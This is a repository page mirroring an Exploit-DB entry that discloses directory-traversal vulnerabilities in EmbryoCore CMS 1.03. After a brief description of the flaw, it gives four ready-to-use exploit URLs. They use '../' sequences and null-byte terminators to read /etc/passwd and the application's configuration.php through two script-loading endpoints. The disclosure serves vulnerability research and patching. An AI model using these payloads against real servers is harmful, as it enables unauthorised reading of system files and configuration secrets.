bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/37509.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

17 lines
No EOL
902 B
Text
Raw Blame History

source: https://www.securityfocus.com/bid/54470/info
EmbryoCore CMS is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting these issues may allow an attacker to obtain sensitive information that could aid in further attacks.
EmbryoCore 1.03 is vulnerable; other versions may also be affected.
http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=./configuration.php%00
http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=../../../../../../etc/passwd%00
http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=../../../../../../etc/passwd%00
http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=./configuration.php%00
Reference in a new issue View git blame Copy permalink